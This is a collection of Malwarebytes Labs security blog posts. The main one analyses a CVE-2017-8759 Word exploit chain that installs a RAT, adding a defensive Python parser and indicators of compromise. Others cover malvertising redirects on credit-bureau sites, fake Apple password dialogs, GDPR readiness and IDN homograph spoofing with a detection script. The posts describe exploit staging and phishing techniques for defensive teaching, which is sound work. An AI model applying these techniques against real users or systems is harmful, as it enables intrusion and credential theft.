
Since OpenXML files are archives, they can be decompressed to reveal their content.


Opening document.xml.rels reveals an interesting external URL, pointing to another document.

The relationship with Id="rID6" is loaded by the main document.xml file. If we open the document without network connectivity (to prevent the automatic download), we can spot where this object is located in the page.

The actual exploit: CVE-2017-8759

The remote file saqlyf.doc is downloaded into the Temporary Internet Files folder and opened by Product Description.docx.

This time, it is an RTF file.

After we convert the hexadecimal encoding to binary (oledump), we can spot another interesting URL.

At this point, we could be looking at CVE-2017-0199 if the server answered with a MIME type of application/hta. But in this case we have something different: we can quickly spot the SOAP moniker reference that marks CVE-2017-8759, a code-injection flaw in the .NET Framework’s SOAP WSDL parser.

The above code will parse and execute the content of the oghujp.hta file pictured below.

The nasty bit is encoded with ChrW, but we can let VBScript do the work and output it in human-readable form.

This is the final part of the exploitation phase, and it involves running PowerShell to download and run a binary.
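The three analysis steps above (pulling the external relationship out of the .docx, hex-decoding the RTF object data, and unpacking the ChrW-encoded VBScript) can be scripted. The following is an added example, not code from the original post or from oletools, that performs all three on constructed samples; the hostnames (example.invalid), the relationship Ids and the sample strings are made up for the demonstration and are not the indicators of this incident. One caveat it encodes: a clickable hyperlink relationship with TargetMode="External" is normal in a benign document, whereas an External target on an object or template relationship is fetched when the document opens, which is what makes it worth a closer look.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
RELS_PART = "word/_rels/document.xml.rels"
# Clickable links are normal; anything else with an External target is resolved on open.
BENIGN_EXTERNAL_TYPES = {"hyperlink"}


def external_relationships(docx_bytes):
    """Step 1: every relationship with TargetMode="External", as (Id, short type, Target)."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        if RELS_PART not in pkg.namelist():
            return found
        root = ET.fromstring(pkg.read(RELS_PART))
        for rel in root.iter(REL_NS + "Relationship"):
            if rel.get("TargetMode", "Internal") == "External":
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append((rel.get("Id"), rel_type, rel.get("Target")))
    return found


def auto_fetched_targets(docx_bytes):
    """External targets Word resolves without a click (everything but plain hyperlinks)."""
    return [r for r in external_relationships(docx_bytes) if r[1] not in BENIGN_EXTERNAL_TYPES]


HEX_RUN = re.compile(rb"(?:[0-9A-Fa-f]{2}\s*){8,}")   # long runs of hex pairs (\objdata payloads)
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def decode_rtf_hex(rtf_bytes):
    """Step 2: concatenate and hex-decode the long hex runs in an RTF file.
    Runs are taken greedily, so a hex-looking control-word tail may prepend a byte."""
    out = []
    for m in HEX_RUN.finditer(rtf_bytes):
        run = re.sub(rb"\s", b"", m.group(0))
        out.append(bytes.fromhex(run[: len(run) & ~1].decode("ascii")))
    return b"".join(out)


def urls_in(data):
    return [u.decode("ascii") for u in URL_RE.findall(data)]


CHR_RE = re.compile(r"Chr[WB]?\(\s*(&H[0-9A-Fa-f]+|\d+)\s*\)", re.IGNORECASE)


def decode_chrw(vbs_text):
    """Step 3: rebuild a string assembled from ChrW()/Chr() calls (decimal or &H hex).
    Only the Chr* calls are decoded; literal fragments between them are not kept."""
    def value(tok):
        return int(tok[2:], 16) if tok[:2].upper() == "&H" else int(tok)
    return "".join(chr(value(t)) for t in CHR_RE.findall(vbs_text))


# Constructed samples (not the files from the incident); hosts use the reserved .invalid TLD.
def build_sample_docx(target):
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
            '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.invalid/" TargetMode="External"/>'
            '<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="%s" TargetMode="External"/>'
            '</Relationships>') % target
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<w:document/>")
        pkg.writestr(RELS_PART, rels)
    return buf.getvalue()


SAMPLE_DOCX = build_sample_docx("http://example.invalid/saqlyf.doc")
SAMPLE_RTF = (b"{\\rtf1{\\object\\objautlink{\\*\\objdata "
              + b"http://example.invalid/oghujp.hta".hex().encode() + b"}}}")
SAMPLE_VBS = ("ChrW(112)&ChrW(111)&ChrW(119)&ChrW(101)&ChrW(114)"
              "&ChrW(115)&ChrW(104)&ChrW(101)&ChrW(108)&ChrW(108)")

if __name__ == "__main__":
    print("auto-fetched external targets:", auto_fetched_targets(SAMPLE_DOCX))
    print("URLs in RTF object data:", urls_in(decode_rtf_hex(SAMPLE_RTF)))
    print("decoded ChrW string:", decode_chrw(SAMPLE_VBS))
```

Feed a real sample to external_relationships() and decode_rtf_hex() offline, as the post does, so the analysis never triggers the download itself.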

Attack payload: a RAT

This attack was meant to install a commercial Remote Administration Tool known as Orcus RAT, which, as seen previously, was also hosted on the same server as the exploit. The program is written in .NET and offers functions such as keylogging, remote desktop, and access to the webcam.

The file is concealed as mozilla.exe and periodically checks with its command and control infrastructure.

While commercial RATs can be used for legitimate purposes, malicious actors often abuse them for their own sinister goals.


Part of the malicious VBScript creates a fake document on the fly that is displayed to the user. If you look carefully, you will notice that this file is called Document1, so it is a new file rather than the original Product Description.docx. It also contains too many typos (but that’s a debate for another day).

Attack infrastructure

The exploit and payload used in this attack are served from a free file hosting site at pomf[.]cat.

A cursory look at the site revealed that many other malicious files are also hosted on this platform. We have reached out and requested a takedown of the offending files.


This type of attack relies on a little bit of social engineering to trick the user into opening a Word document, while the rest is handled by an exploit that was patched just a month ago. It’s quite likely many machines out there are still vulnerable if those updates have not been applied in a timely fashion.

Scanning for the original document at the gateway may not have returned anything due to its relatively benign nature, and this is why protection at the end point is so important. More and more attacks these days are modular and retrieve payloads on the fly in order to evade detection.

Malwarebytes users are already protected against this exploit. Additionally, we detect the RAT as Backdoor.NanoCore.


Indicators of compromise

Initial document (Product Description.docx)


RTF (CVE-2017-8759) 5758c31928c5f962fbb3ec2d07130e189a8cf4f3fbd0cd606cb1c1d165334a1c

PNG (CVE-2017-8759) 5ed4582313d593a183ab0b8889dc3833c382ce9ca810287d0fcf982275b55e60

HTA (CVE-2017-8759) b048a2d2ea3bb552ac6e79e37fc74576a50c79b4d8c9fd73b1276baabc465ebf

Payload (RAT) 72041b65777a527667e73ccc5df95296f182e4787f4a349fcbe0220961dd0ed2


Equifax, TransUnion websites push fake Flash Player in malvertising campaign

Malwarebytes - Thu, 10/12/2017 - 21:42

Dan Goodin reported on Ars Technica that the Equifax website was involved in yet another kerfuffle, this time pushing a fake Flash Player. Looking at the YouTube video of this incident frame by frame, we were able to retrace some of this malvertising chain. (Equifax) -> -> -> -> -> (fake Flash)

For those tracking malvertising, this is a very familiar sequence. However, a question remained as to how we got to the ostats[.]net URL. Dan Goodin shared a link about a possible culprit, namely a third-party library which would have been loaded from:

Since Equifax pulled that site down, it was not possible to identify what that script exactly did. However, a quick search for other websites that were using it returned—surprisingly—another consumer reporting credit agency, namely TransUnion and their Central America website.

By visiting transunioncentroamerica[.]com, we were able to confirm that this fireclick.js script was indeed part of this redirection chain.

This chain ultimately leads to the fake Flash player.

The ostats[.]net domain performs all sorts of redirections, as seen in this RiskIQ PassiveTotal search.

During our tests we encountered fake surveys, Flash updates, and also a redirection to the RIG exploit kit.

Third-party script

Fireclick is a legitimate analytics company. If we look at the script closer, we can see that it loads a URL from the Akamai CDN.

In turn, this loads content from another domain snap.sitestats[.]info.

This eventually leads to ostats[.]net.

Some other websites have the script embedded directly into their main page, and they also are involved in this malvertising campaign.

We are still investigating the incident and will report any updates we find on this blog. In the meantime, Malwarebytes users are protected against malicious redirections from this attack.

Indicators of compromise

10/12/2017 11:58:32 AM,GET,,a248.e.akamai[.]net,CDN
10/12/2017 11:58:33 AM,POST,,snap.sitestats[.]info,Stats site
10/12/2017 11:58:34 AM,GET,,snap.sitestats[.]info,Stats site
10/12/2017 11:58:35 AM,GET,,ostats[.]net,Redirector
10/12/2017 11:58:35 AM,GET,,itechnews[.]org,Malvertising
10/12/2017 11:58:36 AM,GET,,[.]com,Malvertising
10/12/2017 11:58:36 AM,GET,,usd.zeroredirect6[.]com,Malvertising
10/12/2017 11:58:37 AM,GET,,www.temocycle[.]site,Malvertising
10/12/2017 11:58:37 AM,GET,,www.theapplicationappmy23[.]download,Fake Flash site
10/12/2017 11:58:38 AM,GET,,www.bestapps4ever161[.]download,Fake Flash site

Fake Flash player



Labs report: summer ushers in unprecedented season of breaches

Malwarebytes - Thu, 10/12/2017 - 16:00

In this edition of the Malwarebytes Cybercrime Tactics and Techniques report for the third quarter of 2017, we saw a number of high profile breaches targeting the personal information of hundreds of millions of people. While the Equifax breach may have dominated the news cycle, notable attacks against the UK National Health Service (NHS), Instagram, Whole Foods, and Sonic were also reported. In addition, we’ve observed shifts in malware distribution, the revival of some old families, and found cases of international tech support scams.

For the full report, click here. For a summary of the report, check out the video and read on below!

Windows malware

Over the last quarter, we have observed several active spam campaigns pushing the Emotet banking Trojan on Windows systems. This malware makes money by intercepting network traffic and stealing bank account details, then selling them on the black market. In addition, Emotet has also been observed utilizing sophisticated evasion techniques to help hide from security software and spread the infection.

Mac malware

In Mac malware news, we have seen continuous growth and several long-term attackers coming back from the dead: families discovered years ago made a comeback this quarter with new variants.

What this means is that Macs are beginning to attract more persistent adversaries who see the value in infecting Mac users. Apple still has a minority market share in the personal computer world, but they have become increasingly popular and their product’s mythical immunity to malware has been revealed to be just that, a myth.

Android malware

This quarter in Android malware, users have been targeted by a new ‘clicker’ Trojan we call Trojan.Clicker.HYJ. This malware has the capability to spread to other devices by utilizing the victim’s contact list.

Potentially unwanted programs

The adware industry has gone to great lengths to avoid detection by security products, which leaves your system wide open to infection by malware. The adware SmartScreen comes bundled with other PUP software, and its overall goal is to push advertising to any user who installs it. It also hooks into the operations of Windows, blocking security software from running. In the report, we take a deeper look at this pseudo-malware and what it can do.

Tech support scams

Multi-language tech support scams are on the rise globally, driven by geo-targeted malvertising campaigns. We expect an increase in the next quarter.


Put these on your calendars:

On October 25 at 11:00 am (PST) we’re hosting a webinar taking a deeper look at this quarter’s Cybercrime Tactics and Techniques report. Register here.

We’ll be doing a live webcast on November 2 @ noon (PST) on Facebook and YouTube. The event is going to feature Thomas Reed, our Director of Mac Offerings, and we are going to talk about historical Mac malware as well as what you are likely to encounter today, and how to stay safe from it.

Download full report here

We hope you enjoy the latest Cybercrime Tactics and Techniques report. We’d love to hear your feedback. What do you think about developments in cybersecurity this last quarter? What would you like to learn about next quarter? Thanks for reading and safe surfing!


A new kind of Apple phishing scam

Malwarebytes - Wed, 10/11/2017 - 17:15

In a recent blog post, Felix Krause revealed a method for phishing Apple ID passwords on iOS that would be quite indistinguishable from a real iOS password request. This got us thinking about the ramifications—how else could this tactic be used in the Apple ecosystem, and what kind of damage could it do?

Image courtesy of

In the case of Krause’s iOS phishing scam, by using simple code any app could easily simulate a standard iOS password request, and most users wouldn’t think anything was amiss. Looking at Krause’s example above, I have to admit that this is something I might fall victim to, although I might wonder why the request was showing up within the context of a third-party app.

However, I don’t see this particular phish as a huge risk. iOS apps can only be downloaded through the App Store, and although I would never say that it’s impossible to get a phishing app into the App Store, it certainly would not be an easy thing to do. Not only would the hacker have to sneak this code past the review, they’d also have to create a decoy app that would be compelling enough to download—something that is increasingly difficult even for legitimate developers in the crowded iOS App Store. I view this as possible, but unlikely.

Of course, there are many other cases where the App Store screening process wouldn’t come into play, and that could be equally convincing, if not more so.

For example, consider macOS instead of iOS. Unlike on iOS, Mac users can download apps from anywhere, and frequently do. That’s how Mac users end up infected with things like malware, adware, and unethical junk software. Thus, there’s no review process a hacker would have to submit to.

Suppose you’re using your Mac, and suddenly the Mail app opens and shows a password request because of a failure with your iCloud account. It might look something like the image below. What would you do?

Would you enter your iCloud account password there? After all, it will reliably cite a correct iCloud account address. If you did enter your password in this case, sorry to tell you, you’d be pwned.

Okay, maybe that’s not the most convincing password request if you’re a Mac expert and know what these things are supposed to look like. (I can hear the criticisms now.) However, there are a couple important things to keep in mind.

First, this would trick a LOT of people. Sure, maybe not Mac aficionados, but most people are not, and shouldn’t have to be, experts in what every single macOS dialog looks like.

Second, this was the result of a four-line AppleScript I threw together in all of five minutes, with three of those lines involved in getting the email address associated with the user’s iCloud account. It would be entirely possible to make this far more convincing. Even just using AppleScript, it would be possible to use different techniques, and at least one that I can think of, for which I’ve seen a proof-of-concept, would be highly convincing.

Worse, it would be easy to mimic a real macOS authentication dialog, pixel-for-pixel, without too much effort in an app compiled in Xcode.

In fact, a similar event happened earlier this year, when Handbrake was hacked to install the Proton malware. The malicious copy of Handbrake ended up requesting the login password in such a way that even experts fell for it, such as a developer for the well-respected Panic, Inc.

We have become accustomed to such password requests as a part of our daily life, so when we see them, we tend to just enter the password without thinking about it. After all, Macs don’t get malware, right? Fortunately for Mac users, the actual incidences of this kind of harmful malware have been few, but that works in the hackers’ favor, since we’ve become inured to these requests and don’t treat them with the suspicion that they deserve.

So, what can be done about this kind of thing? Unfortunately, there is no one thing that Apple could do to solve this problem. An app will always be able to display a pixel-perfect simulation of any official macOS or iOS password request.

Worse, even a web developer could do the same, by combining screenshots from the target system and a web form. The code could detect the system and display an appropriate “window” for macOS, iOS, Windows, or Android. Slip something like that in as an overlay on top of a hacked legitimate site and you could fool a lot of folks.

Although Apple could direct the user at all times to a known, good location to enter passwords, that’s not always reasonable. Consider, for example, the horrible user experience Apple has foisted on Mac users with the new User-Approved Kernel Extension Loading process in macOS High Sierra. Although this is not the same as a password request, it’s a good example of how forcing the user to a location for security reasons could go horribly wrong, resulting in a bad user experience that may not actually be significantly more secure.

Instead of seeking fixes for something that can’t be fixed, we need to focus on changing our own behaviors. Every password request should always be viewed with suspicion, no matter the source. If Mail pops open and a window appears asking for a password, that doesn’t mean it’s actually Mail doing the asking.

Treating these password requests with suspicion means, in some cases, canceling and entering the password in a known, good location. For example, if an iCloud password is being requested, you should manually go to the iCloud pane in System Preferences to enter it.

Unfortunately, this is not always possible, as in the case of an installer asking for a password or an app asking for a password to install a helper tool. In the case of Handbrake, it is not normal for Handbrake to ask for a password, so seeing a password request in that context is a red flag. Although I must admit that I might have fallen for the fake Handbrake password request, if I were being more careful, I would check the developer’s website or product documentation to see if that is normal for Handbrake.

If the request comes up while you’re using your web browser, try moving the current web browser window around on the screen. If the “window” moves along with it, it’s not actually a window. It’s an element overlaid on top of the web page meant to look like a window, and that will mean it’s a fake.

It would also be possible to test these password requests by knowingly entering an incorrect password. Phishing malware or websites can’t know what your password is until you enter it, so they can’t know you entered the wrong password intentionally, and will simply accept what you typed. If, on the other hand, the bad password is rejected, the request is more likely to be legitimate. A rejection is not proof, though: a fake dialog can just as easily reject the first attempt and ask again, so treat it as lowering suspicion rather than removing it.

With a little caution and attention paid to the context of password requests, you can avoid most, or even all, phishing attempts. The important thing is to be consistent, and not to get sloppy because you’re in a rush.


Make way for the GDPR: Is your business ready?

Malwarebytes - Tue, 10/10/2017 - 17:13

In Week 2 of National Cyber Security Awareness Month (NCSAM), the spotlight is on businesses—particularly, their more profound need to take cybersecurity seriously in this age of breaches. And what better way for them to start this off than to think about how they can improve on handling and storing their clients’ data safely and securely?

If this sounds more like a privacy issue to you, it is. What many should realize is that privacy and security are closely linked. In fact, one cannot think of improving on privacy without improving on security as well, and vice versa.

With the General Data Protection Regulation (GDPR), a chiefly privacy-focused regulation for companies doing business in Europe, taking effect in less than nine months’ time, a majority of B2C and B2B organizations in the US still have a lot of catching up to do on compliance. So, without much ado, let’s get down to the nub of what to do to prepare for the GDPR.

Read: National cybersecurity awareness month: simple steps for online safety

  • Prioritize. Senior management must be on board with preparations needed for change to happen. The GDPR is not something your IT department can handle on their own. In fact, the GDPR transcends the boundaries of IT and extends to other areas in the organization, such as marketing and sales. It’s high time for companies to wake up and act fast by putting cybersecurity and data privacy at the top of their priority list.
  • Assess. Take the time to sit down and review your current and target customer base. This is a crucial stage, as the results will dictate whether your business must comply with GDPR standards or not. (Though the bulk of US businesses are small businesses, and not all of them cater to European and UK citizens, even with an online presence.) If your company does handle personal data from citizens of European member states, ascertain what types of data you currently transmit, process, and store. Also, weigh the value of each data type you are storing. Ask yourself this: “Does the company really need to keep this data? Does this bring sufficient value to the company?” If both answers are “no,” it might be best to get rid of it. In June, the popular pub and hotel chain JD Wetherspoons decided to delete its full database of client email addresses, which it had used to send email newsletters, after concluding that it no longer needed to hold them. Instead, it decided to use social media to notify patrons of deals and special offers.

    Here are other questions to guide you in your assessment:

    • How do you get personal data from your clients? (e.g., forms in company website)
    • Where do you store client personal data? (e.g., PC hard drive, the cloud)
    • How do you protect stored data?
    • Where are client data backups kept? (e.g., removable storage media)
    • Are there gaps in the current processes or controls you already have in place?
  • Hire. Having a Chief Protection Officer (CPO) or Data Protection Officer (DPO) may be crucial, yet not every organization that controls or processes user data must have a DPO. The GDPR (Article 37) requires one where the processing is carried out by a public authority, where the core activities involve regular and systematic monitoring of data subjects on a large scale, or where the core activities consist of large-scale processing of “special categories” of personal data (genetic, biometric, and health data, to name a few) or of criminal-conviction data. The DPO’s principal role is to ensure that the company remains compliant with GDPR standards. Organizations that simply don’t have the time or resources to prepare may decide to hire a third-party consultant to help them out, and this is fine, too.
  • Plan. Draft a data protection and mitigation plan that best suits your company. Following a template doesn’t cut it anymore. Plans must be customized to address or reduce the risks that come with how a business processes data. Also, firms with privacy policies in place must revamp them to cover the extended rights the GDPR gives to data subjects in the EU (including, at the time of writing, the UK). To guide you on how to go about doing this, try answering these questions:
    • How will you keep the stored data safe? (e.g., encryption)
    • How should you handle requests from clients to delete their data?
    • How can you make data available to clients?
    • How can you make client data portable?
    • What should your incident response, in the event of a breach, look like?
  • Implement. Now that you have made the assessment, hired a consultant, answered the questions, and planned around them, it’s time to put those plans into action. Start backing up files, encrypting them where you judge it necessary, limiting access to sensitive data to specific individuals only, training your staff on your security and privacy policies, and making sure that all your suppliers and data processors have been informed and confirmed to be on board with the changes.
  • Test. If you have envisioned and drafted an incident response plan, you should put it to the test. See how well the relevant teams in your organization handle a pretend breach based on the new protocol, identify the good points and bad points from it, and make the necessary adjustments to remove or at least minimize the latter. After changes are made, further refine the terms by testing them again and again.
  • Persevere. Starting is one thing, but keeping your plan in place is another. Businesses must continue to remain compliant in the long term by doing a continuous assessment and process improvement. This also includes the regular training of employees and continuing to adhere to a culture of security and privacy in the workplace.

The coming of the GDPR has caused a lot of businesses to recoil out of fear and hype. Unfortunately, this also resulted in them putting off making the much-needed improvements to their data processing activities and security. While there are penalties for non-compliance, this shouldn’t be the main reason why companies must go through the ordeal of what we have listed above. It all boils down to businesses taking better care of their clients by protecting their data. Not only will this foster customer loyalty, but it also allows the company to stay in business.


A week in security (October 02 – October 08)

Malwarebytes - Mon, 10/09/2017 - 20:26

Last week, we gave you some tips for National Cybersecurity Awareness Month, walked through an exploration of a small adware file, and explored the complicated world of the Homograph attack. Here’s what else happened in security.


Many of our team members attended VB2017 in Madrid, one of the premier yearly security conferences that brings together researchers, companies, law enforcement, and more in an effort to explore the latest security research. Here’s a collection of articles from The Register’s John Leyden, who was in attendance:

  • Bulletproof hosts stay online by operating out of disputed backwaters: A look at how dubious hosts are retreating to places where they can continue to offer dubious services.
  • Spy vs. spy vs. hacker vs… who is THAT? Everyone’s hacking each other: The problem of Intel gathering when everyone is muddying the waters.
  • Hey, IoT vendors. When a paediatric nurse tells you to fix security, you definitely screwed up: The alarming world of IoT medical devices.
  • Avast urges devs to secure toolchains after hacked build box led to CCleaner disaster: An interesting look at the timeline behind the recent CCleaner issues.
  • Video games used to be an escape. Now not even they are safe from ads: My own talk, where I explore the long(ish) history of Advergaming, tricks used to force you to look at ads in games, and how it threatens to reshape many of your real-world interactions via augmented reality. Once the VB talks are uploaded to YouTube, I’ll be linking to many of them.
Other news

Stay safe everyone!


Out of character: Homograph attacks explained

Malwarebytes - Fri, 10/06/2017 - 15:00

In April, Xudong Zheng, a security enthusiast based in New York, found a flaw in the way some modern browsers handle domain names. Chrome, Firefox, and Opera already had measures in place to warn users that they might be visiting a destination other than the one they thought was legitimate, but at that time those checks fired on scripts mixed within one label, not on a label made entirely of look-alike characters from a single non-Latin script. Zheng demonstrated this when he created and registered a proof-of-concept (PoC) page for the domain аррӏе.com, written in pure Cyrillic characters.

What is a homograph attack?

A homograph attack is a method of deception wherein a threat actor leverages the similarities between character scripts to create and register phony copies of existing domains, in order to fool users and lure them into visiting. The attack has some known aliases: homoglyph attack, script spoofing, and homograph domain name spoofing.

Characters (letters and numbers) that look alike are called homoglyphs or homographs, hence the name of the attack. Examples are the Latin small letter O (U+006F) and the digit zero (U+0030). Hypothetically, one might register a version of a well-known domain with the zero swapped in for the O and get away with it. But in this day and age, such simple character swaps could be easily detected.

In an internationalized domain name (IDN) homograph attack, a threat actor creates and registers one or several fake domains using at least one look-alike character from a different script. Again, hypothetically, one might register a domain beginning gοο, the Latin small letter O (U+006F) having been swapped for the Greek small letter Omicron (U+03BF).

Zheng’s PoC is another example of an IDN homograph attack, so let’s list each character he used to illustrate how this particular attack can be highly successful and dangerous if used in the wild. Interestingly, an operating system’s typeface of choice can make it easier or harder for users to visually distinguish non-Latin characters from Latin ones.

Table 1: We used Segoe UI, Microsoft’s system-wide typeface, here.

To the human eye, these Cyrillic glyphs can easily be confused with their Latin counterparts. Computers, however, read these confusables differently, as we can see from the different hex codes assigned to them.

Table 2: We used San Francisco, Apple’s system-wide typeface, here. It’s worth noting that OSX distinguishes the Cyrillic small letter Palochka from the Latin small letter L; however, it does not distinguish the Latin small letter L from the Latin capital letter I, as the text “Cyrillic small letter Ie” in the table shows.

According to this bug report, it seems that the system-wide font for Linux doesn’t distinguish confusable characters either.

The use of all-Cyrillic glyphs—or any other non-Latin characters for this matter—for domain names isn’t the problem. IDN has made it possible for internet users around the globe to create and access domains using their native language scripts. The problem is when these glyphs are misused to deceive internet users.

Is this a new form of online threat?

Homograph attacks have been around for years. As far as we know, Zheng’s PoC was the first of its kind to make headlines and spark a conversation among internet users.

Below are other examples of homographed domains and how they were used:

  • To raise awareness, a security consultant highlighted the common misconception that sometimes a Latin capital letter I (U+0049) looks similar to a Latin small letter L (U+006C) by registering a fake Lloyds Bank website and adding an SSL certificate to it to make it look as legitimate as the real one.
  • A security researcher from NTT Security shared his experience about a friend of his who received several Google Analytics spam messages containing the domain secret[DOT]ɢoogle[DOT]com. The “ɢ” there wasn’t the Latin capital letter G (U+0047) but a Latin letter small capital G (U+0262).
  • A security researcher from NewSky Security found an impersonated Adobe website serving the Betabot malware, pretending to be an Adobe Flash Player installer file. The threat actor used the Latin small letter B with Dot below (U+1E05) to replace the Latin small letter B (U+0062) in “”.

How is this different from typosquatting?

Although typosquatting also uses visual tricks to deceive users, it relies heavily on users mistyping a URL in the address bar, hence the “typo” in its name.

Are all homograph attacks just phishing attacks?

Not necessarily. Although homograph attacks usually involve phishing, threat actors could create fake yet believable websites for other fraudulent purposes or to introduce malware onto user systems, as in the case of the bogus Adobe website we mentioned earlier.

In this in-depth report about IDN homograph attacks, our friends at Symantec have noted that several homographed domains they found were either part of a malvertising network, hosting exploit kits and malicious mobile apps, or generated by botnets.

How can we protect ourselves from homograph attacks?

Browser tools such as Punycode Alert and the Quero Toolbar have been created to alert users to potential homograph attacks. Users have the discretion of adopting them alongside the built-in security mechanisms in today’s browsers. However, no tool can replace vigilance when browsing online and solid cybersecurity hygiene. This includes:

  • Regularly updating your browser (it may be your first line of defense against homograph attacks)
  • Confirming that the legitimate site you’re on has an extended validation certificate (EVC)
  • Avoiding clicking links from emails, chat messages, and other publicly available content, most especially social media sites, without ensuring that the visible link is indeed the true destination.
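As an added example (not code from the Malwarebytes post), here is a small Python check that applies the code-point reasoning from the sections above and the advice in this one: it converts a domain to its Punycode form and flags any label that mixes scripts or whose glyphs all collapse to an ASCII look-alike. The confusables table is a constructed subset of the code points named in the article, not Unicode's full confusables list, and the sample domains are constructed for the demonstration.

```python
import unicodedata

# Constructed confusables table (a subset of the code points named in the
# article, not Unicode's full confusables.txt): glyph -> ASCII look-alike.
CONFUSABLES = {
    "\u03bf": "o",  # Greek small letter omicron
    "\u0262": "g",  # Latin letter small capital G
    "\u1e05": "b",  # Latin small letter B with dot below
    "\u0430": "a",  # Cyrillic small letter a
    "\u0435": "e",  # Cyrillic small letter ie
    "\u043e": "o",  # Cyrillic small letter o
    "\u0440": "p",  # Cyrillic small letter er
    "\u0441": "c",  # Cyrillic small letter es
    "\u04cf": "l",  # Cyrillic small letter palochka
}

def script_of(ch: str) -> str:
    """Coarse script taken from the Unicode name: LATIN, CYRILLIC, GREEK..."""
    if ch in "0123456789-":
        return "COMMON"  # digits and hyphen belong to every script
    return unicodedata.name(ch, "UNKNOWN").split(" ")[0]

def to_punycode(domain: str) -> str:
    """ACE form (xn--...) that browsers fall back to for distrusted labels."""
    return domain.encode("idna").decode("ascii")

def analyze_label(label: str) -> dict:
    """Flag a label that mixes scripts or is a whole-script look-alike of ASCII."""
    scripts = {script_of(ch) for ch in label} - {"COMMON"}
    looks_like = "".join(CONFUSABLES.get(ch, ch) for ch in label)
    confusables = [f"U+{ord(ch):04X}" for ch in label if ch in CONFUSABLES]
    mixed = len(scripts) > 1
    # An all-Cyrillic word is legitimate; flag only a label whose every glyph
    # collapses to an ASCII Latin string that it is not.
    whole_script_spoof = looks_like != label and looks_like.isascii()
    return {"label": label, "scripts": sorted(scripts), "mixed_script": mixed,
            "confusables": confusables, "looks_like": looks_like,
            "suspicious": mixed or whole_script_spoof}

def inspect_domain(domain: str) -> dict:
    """Per-label verdicts plus the Punycode the user would see if it were shown."""
    labels = [analyze_label(part) for part in domain.lower().split(".")]
    return {"domain": domain, "punycode": to_punycode(domain),
            "looks_like": ".".join(l["looks_like"] for l in labels),
            "suspicious": any(l["suspicious"] for l in labels), "labels": labels}

if __name__ == "__main__":
    # Constructed samples: Zheng's all-Cyrillic PoC, the ɢoogle case, a Greek/Latin mix, a real Cyrillic word, apple.com
    for d in ["аррӏе.com", "secret.ɢoogle.com", "lοgin.example", "москва.рф", "apple.com"]:
        r = inspect_domain(d)
        print(f"{r['punycode']:24} looks like {r['looks_like']:20} suspicious={r['suspicious']}")
```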

Remember: Eyes open.

Stay safe!

The Malwarebytes Labs Team

The post Out of character: Homograph attacks explained appeared first on Malwarebytes Labs.
